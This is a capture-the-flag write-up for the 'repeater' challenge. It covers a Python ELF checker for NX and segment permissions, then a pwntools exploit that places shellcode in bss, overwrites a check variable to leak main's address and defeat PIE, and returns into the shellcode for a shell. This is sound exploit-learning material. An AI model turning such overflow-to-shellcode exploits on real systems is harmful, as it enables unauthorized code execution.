攻防世界–repeater

Analyzing the binary

There is a stack overflow, but it only reaches exactly the return address, so ROP is basically out. The write-ups from other people write shellcode into the bss section and then return into bss to execute it, but when I checked locally in gdb the bss section had no execute permission.
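Before assuming that a return into bss will work, it is worth reading the binary's own permission flags. The checker below is an added example (not part of the original write-up and not a tool from the challenge): it parses the ELF64 program headers, reports NX the way checksec does (from the PT_GNU_STACK flags), lists any W+X segments, and answers whether a given PIE offset such as 0x202040 lies in an executable segment. The ELF images it runs on are constructed in the block so it works offline; pass a real file path as the first argument to inspect that instead. The `read_implies_exec` switch models the legacy kernel behaviour (dropped for 64-bit processes in Linux 5.8) where an executable stack made every readable mapping executable, which is one common reason bss is executable on one machine and not on another.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def parse_segments(data):
    """Return (p_type, p_flags, p_vaddr, p_memsz) for every program header
    of a little-endian ELF64 image held in memory."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    segs = []
    for i in range(e_phnum):
        p_type, p_flags, _off, p_vaddr, _pa, _fsz, p_memsz, _al = struct.unpack_from(
            "<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        segs.append((p_type, p_flags, p_vaddr, p_memsz))
    return segs


def flags_str(p_flags):
    """Render p_flags like /proc/pid/maps does, e.g. 'rw-'."""
    return ("r" if p_flags & PF_R else "-") + ("w" if p_flags & PF_W else "-") + \
           ("x" if p_flags & PF_X else "-")


def nx_report(data):
    """checksec-style summary: is the stack non-executable, and does any
    PT_LOAD segment map memory as both writable and executable?"""
    stack_exec = True  # without PT_GNU_STACK Linux falls back to an executable stack
    wx = []
    for p_type, p_flags, p_vaddr, p_memsz in parse_segments(data):
        if p_type == PT_GNU_STACK:
            stack_exec = bool(p_flags & PF_X)
        elif p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            wx.append((p_vaddr, p_memsz))
    return {"nx": not stack_exec, "wx_segments": wx}


def segment_flags(data, vaddr):
    """Flags of the PT_LOAD segment mapping `vaddr` (a PIE offset), or None."""
    for p_type, p_flags, p_vaddr, p_memsz in parse_segments(data):
        if p_type == PT_LOAD and p_vaddr <= vaddr < p_vaddr + p_memsz:
            return p_flags
    return None


def is_executable(data, vaddr, read_implies_exec=False):
    """True if `vaddr` is mapped executable according to the segment flags.
    read_implies_exec=True models the old kernel rule (exec stack => every
    readable mapping is executable); 64-bit Linux >= 5.8 no longer does this."""
    flags = segment_flags(data, vaddr)
    if flags is None:
        return False
    if read_implies_exec:
        return bool(flags & (PF_R | PF_X))
    return bool(flags & PF_X)


def build_elf(segments):
    """Construct a header-only ELF64 image (no code, just program headers).
    Used here as constructed input; a real binary's bytes work the same way."""
    phdrs = b"".join(
        struct.pack("<IIQQQQQQ", p_type, p_flags, 0, p_vaddr, p_vaddr, 0, p_memsz, 0x1000)
        for p_type, p_flags, p_vaddr, p_memsz in segments)
    e_ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8  # ELFCLASS64, LSB, version 1
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", e_ident,
                       3, 62, 1, 0, 64, 0, 0, 64, 56, len(segments), 64, 0, 0)
    return ehdr + phdrs


# Constructed layout resembling a PIE with NX: code r-x, data/bss rw-, stack rw-.
# The bss offset 0x202040 used by the exp falls inside the rw- segment.
NX_SAMPLE = build_elf([
    (PT_LOAD, PF_R | PF_X, 0x0, 0x1000),
    (PT_LOAD, PF_R | PF_W, 0x201d00, 0x400),
    (PT_GNU_STACK, PF_R | PF_W, 0, 0),
])

# Same layout but with an executable stack, i.e. NX disabled (also constructed).
NX_OFF_SAMPLE = build_elf([
    (PT_LOAD, PF_R | PF_X, 0x0, 0x1000),
    (PT_LOAD, PF_R | PF_W, 0x201d00, 0x400),
    (PT_GNU_STACK, PF_R | PF_W | PF_X, 0, 0),
])


def main(argv):
    data = open(argv[1], "rb").read() if len(argv) > 1 else NX_SAMPLE
    rep = nx_report(data)
    print("NX:", "enabled" if rep["nx"] else "disabled", "| W+X segments:", rep["wx_segments"])
    for p_type, p_flags, p_vaddr, p_memsz in parse_segments(data):
        if p_type == PT_LOAD:
            print("  LOAD %#010x-%#010x %s" % (p_vaddr, p_vaddr + p_memsz, flags_str(p_flags)))
    print("offset 0x202040 executable by segment flags:", is_executable(data, 0x202040))


if __name__ == "__main__":
    main(sys.argv)
```

The flags are what the loader asks for; the permissions a running process actually has are what gdb's vmmap or /proc/pid/maps shows, so check both when a local run disagrees with a write-up.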

Exploiting the program

Judging from the analysis, a plain stack overflow is all that is needed.

The binary has PIE enabled, though, so that has to be bypassed; the program itself hands out a way to do it, so it is fairly simple. The main point here is practice in writing the exp script.

exp

from pwn import *

context.log_level = 'debug'   # the original set this to True, which pwntools takes as level 1; 'debug' is the intended setting
context.arch = 'amd64'
io = process('./repeater')
# io = remote("61.147.171.105", "57019")

# Stage 1: the name buffer lives in bss, so the shellcode is stored there.
shellcode = asm(shellcraft.sh())
io.sendlineafter(b"Please give me your name :", shellcode)

# Stage 2: overflow 0x20 bytes of buffer and overwrite the checked variable with
# the magic value 0x321321 (3281697), which makes the program print main's address.
payload = b'A' * 0x20 + p64(0x321321)
io.sendlineafter(b"input :", payload)

io.recvuntil(b'But there is gift for you :\n')
main_addr = int(io.recvline().strip(), 16)   # leak is printed as a hex string
base_addr = main_addr - 0xa33               # main sits at offset 0xa33 in the binary
log.info("base_addr: " + hex(base_addr))

# Stage 3: overflow again and return into the shellcode stored at base + 0x202040 (bss).
payload = b'A' * 0x20 + p64(0) + p64(0xdeadbeef) + p64(0xdeadbeef) + p64(base_addr + 0x202040)
io.sendlineafter(b"input :", payload)
io.interactive()